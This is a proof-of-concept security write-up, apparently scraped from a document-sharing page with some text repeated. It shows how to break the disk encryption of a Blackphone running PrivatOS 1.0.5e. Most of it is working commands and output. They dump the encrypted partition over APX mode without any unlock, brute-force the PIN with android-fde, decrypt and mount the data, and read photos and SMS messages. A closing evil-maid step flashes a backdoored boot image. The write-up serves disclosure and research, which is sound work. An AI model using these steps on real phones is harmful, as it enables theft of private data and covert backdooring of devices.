Crack the user data on Blackphone: Proof of Concept
4
=================================================== Crack the user data on Blackphone: Proof of Concept =================================================== by Sébastien Dudek Targeted versions : - Android 4.4.2 - Kernel version 3.4.62-g00009e6 - build = KOT49H PrivatOS 1.0.5e Dependencies : - Python >= 2.6 but < 3 - Python M2Crypto ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $ mkdir WAKdump $ cd WAKdump WAKdump$ git clone https://github.com/sogeti-esec-lab/android-fde.git WAKdump$ cd android-fde/dump_nvtegra/Linux WAKdump/android-fde/dump_nvtegra/Linux$ ls dumpEncryptedPart.sh dumpos.sh nvflash ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To dump the encrypted "user_date.img" with "user_data_footer.img" we need to switch the device to APX mode (no unlock mechanism are present, these steps are similar to ODIN on Samsung Galaxy devices). First, we have to switch off the phone and turn it on pressing the POWER button and wait until the phone vibrates, then still holding the POWER button; we press the VOLUME-UP and VOLUME-DOWN buttons in the same time. After that with volume down and volume up buttons we select the NVPFlash recovery mode option and here we are in APX mode. When it's done we can start the dump with "./dumpEncryptedPart.sh" script: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ ./dumpEncryptedPart.sh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script only dumps the needed parititons to perfom our brute-force as follows: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ ls ROM userdata_footer.img userdata.img ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As we can see the userdata.img partition looks encrypted: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ cd ROM WAKdump/android-fde/dump_nvtegra/Linux/ROM$ userdata.img | head -n 2 00000000 64 8a ed 1b f3 d8 64 b3 a3 45 41 ea 3b 0d 79 8f |d.....d..EA.;.y.| 00000010 a7 fd 41 4d d4 57 a0 d8 99 63 2d 6c b7 93 69 ea |..AM.W...c-l..i.| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
Upload
gilbert-laszlo-kallenborn -
Category
Documents
-
view
104 -
download
0
description
Crack the user data on Blackphone: Proof of Conceptby Sébastien DudekTargeted versions : - Android 4.4.2 - Kernel version 3.4.62-g00009e6 - build = KOT49H PrivatOS 1.0.5eDependencies : - Python >= 2.6 but - Python M2Crypto
Transcript of Crack the user data on Blackphone: Proof of Concept
-
=================================================== Crack the user data on Blackphone: Proof of Concept =================================================== by Sbastien Dudek Targeted versions : - Android 4.4.2 - Kernel version 3.4.62-g00009e6 - build = KOT49H PrivatOS 1.0.5e Dependencies : - Python >= 2.6 but < 3 - Python M2Crypto ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $ mkdir WAKdump $ cd WAKdump WAKdump$ git clone https://github.com/sogeti-esec-lab/android-fde.git WAKdump$ cd android-fde/dump_nvtegra/Linux WAKdump/android-fde/dump_nvtegra/Linux$ ls dumpEncryptedPart.sh dumpos.sh nvflash ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To dump the encrypted "user_date.img" with "user_data_footer.img" we need to switch the device to APX mode (no unlock mechanism are present, these steps are similar to ODIN on Samsung Galaxy devices). First, we have to switch off the phone and turn it on pressing the POWER button and wait until the phone vibrates, then still holding the POWER button; we press the VOLUME-UP and VOLUME-DOWN buttons in the same time. After that with volume down and volume up buttons we select the NVPFlash recovery mode option and here we are in APX mode. When it's done we can start the dump with "./dumpEncryptedPart.sh" script: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ ./dumpEncryptedPart.sh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script only dumps the needed parititons to perfom our brute-force as follows: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ ls ROM userdata_footer.img userdata.img ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As we can see the userdata.img partition looks encrypted: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ cd ROM WAKdump/android-fde/dump_nvtegra/Linux/ROM$ userdata.img | head -n 2 00000000 64 8a ed 1b f3 d8 64 b3 a3 45 41 ea 3b 0d 79 8f |d.....d..EA.;.y.| 00000010 a7 fd 41 4d d4 57 a0 d8 99 63 2d 6c b7 93 69 ea |..AM.W...c-l..i.| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
To retrieve it, we will crack this partition with "android-fde" tools (Github link: https://github.com/sogeti-esec-lab/android-fde) : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ cd ../../ WAKdump/android-fde$ cd pydroidfde WAKdump/android-fde$ python2 bruteforce.py usage: bruteforce.py [-h] [-d MAXPIN_DIGITS] [-o OUTPUT_KEYFILE] encrypted_partition header_file bruteforce.py: error: too few arguments ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To begin the brute-force, we only need to provide the output keyfile, encrypted_partition and header_file as follows : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde$ python2 bruteforce.py -o keyblackphone ../android-fde/dump_nvtegra/Linux/ROM/userdata.img ../android-fde/dump_nvtegra/Linux/ROM/userdata_footer.img Magic : 0xD0B5B1C4 Major Version : 1 Minor Version : 2 Footer Size : 104 bytes Flags : 0x00000000 Key Size : 128 bits Failed Decrypts: 0 Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0x7BEE47CD52489BCCE4CB148D32A0877A Salt : 0x0E92933EB21BE7D192D2518A4C9DC2A4 ---------------- Trying to Bruteforce Password... please wait Trying passwords from 0 to 100 [+] This partition uses scrypt [+] scrypt parameters are: N=0xf, r=0x3, p=0x1 Password : 0000 Derived Key : 0x2FA82E9792A4C3ABE9352FBB4B9C31FD Derived IV : 0x3F74FAD55977762803B03AC22CF6D47D Decrypted Key : 0x5B49A4C3FA3971F5DA7A40BC3A6C11BE [...] Wait until we find the right pin/password ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When the bruteforce finds the pin/passphrase here is what happens: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [...] Trying to Bruteforce Password... please wait [+] This partition uses scrypt [+] scrypt parameters are: N=0xf, r=0x3, p=0x1 Password : 20152015 Derived Key : 0x511C4E2CD295F772C099A4332C653973 Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE ---------------- Decrypted data: 00000000: A7 FD 41 4D D6 57 A0 D8 99 63 2D 6C 77 BB 01 D8 ..AM.W...c-lw...
-
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ Found PIN!: 20152015 Saving decrypted master key to 'keyblackphone' Done. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The PIN configured by 01net to encrypt the data is "20152015". Now we need to decrypt the partition using the same"android-fde" tools: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde$ python2 decrypt.py usage: decrypt.py [-h] [-p PASSWORD] [-s SECTOR] encrypted_partition header_file outfile decrypt.py: error: too few arguments WAKdump/android-fde$ python2 decrypt.py -p 20152015 ../android-fde/dump_nvtegra/Linux/ROM/userdata.img ../android-fde/dump_nvtegra/Linux/ROM/userdata_footer.img decrypted_userdata.img Magic : 0xD0B5B1C4 Major Version : 1 Minor Version : 2 Footer Size : 104 bytes Flags : 0x00000000 Key Size : 128 bits Failed Decrypts: 0 Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0x7BEE47CD52489BCCE4CB148D32A0877A Salt : 0x0E92933EB21BE7D192D2518A4C9DC2A4 ---------------- [+] This partition uses scrypt [+] scrypt parameters are: N=0xf, r=0x3, p=0x1 Password : 20152015 Derived Key : 0x511C4E2CD295F772C099A4332C653973 Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE ---------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Then wait until it decrypts the whole "userdata.img" partition... Once the script has decrypted the data, we can start to mount the "decrypted_userdata.img" file using the "mount" Linux command for example: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde$ sudo mount decrypted_userdata.img /mnt WAKdump/android-fde$ cd /mnt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Then we are able to see the stored pictures that were encrypted with user data at the begining: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mnt$ find . -name "IMG*" ./media/0/DCIM/Camera/IMG_20150126_184947.jpg ./media/0/DCIM/Camera/IMG_20150126_184951.jpg ./media/0/DCIM/Camera/IMG_20150126_184954.jpg
-
./media/0/DCIM/Camera/IMG_20150126_185007.jpg
./media/0/DCIM/Camera/IMG_20150126_185010.jpg
./media/0/DCIM/Camera/IMG_20150126_185014.jpg
./media/0/DCIM/Camera/IMG_20150126_185019.jpg
./media/0/DCIM/Camera/IMG_20150126_185028.jpg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ But we can also retrieve user SMS : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ sqlite3 ./data/com.android.providers.telephony/databases/mmssms.db SQLite version 3.8.8.2 2015-01-30 14:30:45 Enter ".help" for usage hints. sqlite> select * from SMS; 1|1|06 80 30 73 79||1422294679062|0||1|-1|2|||Salut ! Je t'cris depuis mon super tlphone scuris||0|0|1 2|1|+33680307379||1422296172000|1422296172000|0|0|-1|1|0||Hello ! Je suis un sms factice viens me pirater ;)|+33660003000|0|0|0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ And so on. Evil Maid attack ================ To perform the evil maid attack, we have to download a homemade "boot.img" to the device as follows: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ WAKdump/android-fde/dump_nvtegra/Linux$ sudo nvflash -r --download 18 evilboot.img ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This way we could install a backdoor that waits for partition to be decrypted, and inject itself in other process to extract data for example. Conclusion ========== No unlock procedure was needed to read or write into the flash. So once an attacker retrieves a phone, he can backdoor or try to retrieve targeted data using the decribded bruteforce in this mail. It's a matter of time, and the complexity will vary depending on password complexity. In the other hand, the "boot.img" backdooring is a very efficient way, as this partition can be downloaded quickly to the device (few seconds).
